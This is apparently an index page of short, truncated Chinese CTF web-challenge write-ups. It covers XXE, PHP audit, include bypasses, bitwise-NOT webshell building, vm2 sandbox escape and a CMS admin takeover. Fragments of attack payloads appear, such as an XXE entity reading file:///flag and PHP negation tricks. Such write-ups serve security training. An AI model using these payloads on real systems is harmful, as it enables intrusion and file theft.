# [CSAWQual2019]Web_Unagi 提示需要上传 xml 文件,flag 在 /flag 中。很容易联想到 XXE 漏洞来读取。 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag"...

# [MRCTF2020]Ezaudit 打开题目是个漂亮的前端,扫一下发现 www.zip 文件泄露,下载审计 <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $Private_key =...

# [WMCTF2020]Make PHP Great Again 前言: 关键字:[require_once|proc | 文件包含 | session|session.upload_progress] <?phphighlight_file(__FILE__);require_once 'flag.php';if(isset($_GET['file'])) { require_once $_GET['file'];}# 题解 绕过不能重复包含文件的限制 # 解法 1 PHP 最新版的小...

进来是这样的场景:用 f12 进入网络发现有些一样的传参: 发现有个 search 的传参:(结合源码(ctrl+u)发现有个 life on mars 这个文件) life on mars.js function get_life(query) { $.ajax({ type: "GET", url: "/query?search=" + query, data: "{}", contentType:...

# [suctf2018]GetShell 参考 p 神利用取反来获取可用字符: <?php error_reporting(0); $a = ~垂; echo $a."\n"; echo $a[1]; /* 运行得: a} a */ ?> 🐎一下汉字: echo ~茉**[**$____**]**;//s echo ~内**[**$____**]**;//y echo ~茉**[**$____**]**;//s echo ~苏**[**$____**]**;//t echo...

# [HFCTF2020]JustEscape 题目说真的不是 PHP 吗? 十有八九不是,猜测可能是 Java,结果是 js。 # 用 Error().stack , 看一下报错信息。 报错显示是 vm.js ,考的 vm 沙箱逃逸。 POC 参考: https://github.com/patriksimek/vm2/issues/225 payload1: (function...

# [GXYCTF2019]StrongestMind 搞了个计算机,要算 1000 次正确就给 flag 直接上脚本: import requests import re import time url = 'http://6f50dc2f-2732-4820-9115-f988593362dd.node5.buuoj.cn:81/' session = requests.session() req = session.get(url).text flag = "" for i in range(1010): try: result =...

# [GKCTF 2021]easycms dirsearch 扫目录发现 admin.php 进入后台登录页面 猜 admin 的 12345 因为首页的提示显示密码是五位数 这种 CMS,第一时间想到主题。 试了下主题可以导出,主题这里想导入需要创建这个文件 ![1](…/images/NSS[GKCTF 2021]easycms/1.png) 所以要创建一个文件 /var/www/html/system/tmp/qgak.txt 在设计 - 组件 -...

# [BJDCTF2020]ezPHP ctrl+u 获得提示源码地址: GFXEIM3YFZYGQ4A= base32解码后: 1nD3x.php 进入获得源码: <?phphighlight_file(__FILE__);error_reporting(0); $file = "1nD3x.php";$shana = $_GET['shana'];$passwd = $_GET['passwd'];$arg = '';$code = '';echo "<br...